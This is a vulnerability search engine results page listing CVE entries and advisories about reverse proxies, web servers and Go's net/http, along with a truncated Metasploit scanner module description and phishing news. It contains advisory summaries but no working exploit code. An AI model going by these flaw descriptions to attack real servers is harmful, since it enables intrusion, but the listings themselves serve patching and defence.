CVE Search Engine - Security Vulnerabilities and Exploits Search Tool

Kitploit•added 2024/09/24 11:30 a.m.•195 views

SafeLine - Serve As A Reverse Proxy To Protect Your Web Services From Attacks And Exploits

SafeLine is a self-hosted WAFWeb Application Firewall to protect your web apps from attacks and exploits. A web application firewall helps protect web apps by filtering and monitoring HTTP traffic between a web application and the Internet. It typically protects web apps from attacks such as SQL...

7.5AI score

Exploits0References1

RedhatCVE•added 2024/09/23 5:10 a.m.•12 views

CVE-2024-47220

A flaw was found in the webrick toolkit. This issue occurs because the server incorrectly handles requests with both Content-Length and Transfer-Encoding headers. This can allow an attacker to sneak in an extra request such as GET /admin after the normal request POST /user. As a result,...

7.5CVSS6.5AI score0.00108EPSS

Exploits0References5

Fedora•added 2024/09/13 1:55 a.m.•11 views

[SECURITY] Fedora 40 Update: haproxy-2.9.10-1.fc40

HAProxy is a TCP/HTTP reverse proxy which is particularly suited for high availability environments. Indeed, it can: - route HTTP requests depending on statically assigned cookies - spread load among several servers while assuring server persistence through the use of HTTP cookies - switch to...

7.5CVSS7.1AI score0.01495EPSS

Microsoft CVE•added 2024/09/11 7:0 a.m.•1 views

In Go before 1.15.13 and 1.16.x before 1.16.5 some configurations of ReverseProxy (from net/http/httputil) result in a situation where an attacker is able to drop arbitrary headers.

...

5.3CVSS7AI score0.00039EPSS

Exploits1

Packet Storm•added 2024/09/01 12:0 a.m.•357 views

Apache Reverse Proxy Bypass Scanner

This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule 'Apache Reverse Proxy Bypass Vulnerability Scanner', 'Description' = %q Scan for poorly configured reverse proxy servers. By default, this module...

5CVSS7.3AI score0.76893EPSS

Exploits12

The Hacker News•added 2024/08/29 11:26 a.m.•19 views

How AitM Phishing Attacks Bypass MFA and EDR—and How to Fight Back

Attackers are increasingly using new phishing toolkits open-source, commercial, and criminal to execute adversary-in-the-middle AitM attacks. AitM enables attackers to not just harvest credentials but steal live sessions, allowing them to bypass traditional phishing prevention controls such as MF...

7.4AI score

NVD•added 2024/08/27 9:15 p.m.•19 views

CVE-2024-45049

Hydra is a Continuous Integration service for Nix based projects. It is possible to trigger evaluations in Hydra without any authentication. Depending on the size of evaluations, this can impact the availability of systems. The problem can be fixed by applying...

7.5CVSS0.0036EPSS

Exploits0References4

Cvelist•added 2024/08/27 8:33 p.m.•21 views

CVE-2024-45049 Nix Hydra Missing authentication when triggering evaluations

7.5CVSS0.0036EPSS

Exploits0References4

Vulnrichment•added 2024/08/27 8:33 p.m.•14 views

CVE-2024-45049 Nix Hydra Missing authentication when triggering evaluations

7.5CVSS7.5AI score0.0036EPSS

Exploits0References4

Fedora•added 2024/08/26 2:5 a.m.•33 views

[SECURITY] Fedora 40 Update: nginx-1.26.2-1.fc40

Nginx is a web server and a reverse proxy server for HTTP, SMTP, POP3 and IMAP protocols, with a strong focus on high concurrency, performance and low memory usage...

5.7CVSS4.8AI score0.00202EPSS

OpenVAS•added 2024/08/26 12:0 a.m.•18 views

Fedora: Security Advisory for nginx (FEDORA-2024-8ba5080dfa)

The remote host is missing an update for the SPDX-FileCopyrightText: 2024 Greenbone AG Some text descriptions might be excerpted from a referenced sources, and are Copyright C by the respective right holders. SPDX-License-Identifier: GPL-2.0-only ifdescription...

5.7CVSS7AI score0.00202EPSS

OpenVAS•added 2024/08/26 12:0 a.m.•24 views

Fedora: Security Advisory for nginx (FEDORA-2024-6ba57fd2a3)

5.7CVSS7AI score0.00202EPSS

OSV•added 2024/08/23 11:8 a.m.•1 views

OESA-2024-2059 golang security update

. Security Fixes: The net/http HTTP/1.1 client mishandled the case where a server responds to a request with an "Expect: 100-continue" header with a non-informational 200 or higher status. This mishandling could leave a client connection in an invalid state, where the next request sent on the...

OSV•added 2024/08/22 4:39 p.m.•11 views

GHSA-QXQC-27PR-WGC8 GoAuthentik vulnerable to Insufficient Authorization for several API endpoints

Summary Several API endpoints can be accessed by users without correct authentication/authorization. The main API endpoints affected by this: - /api/v3/crypto/certificatekeypairs//viewcertificate/ - /api/v3/crypto/certificatekeypairs//viewprivatekey/ - /api/v3/.../usedby/ Note that all of the...

9.1CVSS7.5AI score0.02987EPSS

Exploits0References5

OSV•added 2024/08/16 11:8 a.m.•2 views

OESA-2024-1979 golang security update

OSV•added 2024/08/16 11:8 a.m.•1 views

OESA-2024-1980 golang security update

CNNVD•added 2024/08/14 12:0 a.m.•2 views

F5 Nginx 安全漏洞

F5 Nginx is a lightweight web server/reverse proxy server and email IMAP/POP3 proxy server from F5 USA, distributed under the BSD-like protocol. A security vulnerability exists in F5 Nginx, which stems from the possibility that undisclosed requests may result in increased memory resource...

8.7CVSS9AI score0.01047EPSS

Exploits0References3

OSV•added 2024/08/09 11:8 a.m.•1 views

OESA-2024-1952 golang security update

Amazon•added 2024/07/22 12:0 a.m.•1 views

Medium: golang

Issue Overview: The net/http HTTP/1.1 client mishandled the case where a server responds to a request with an "Expect: 100-continue" header with a non-informational 200 or higher status. This mishandling could leave a client connection in an invalid state, where the next request sent on the...

7.5CVSS6.8AI score0.01018EPSS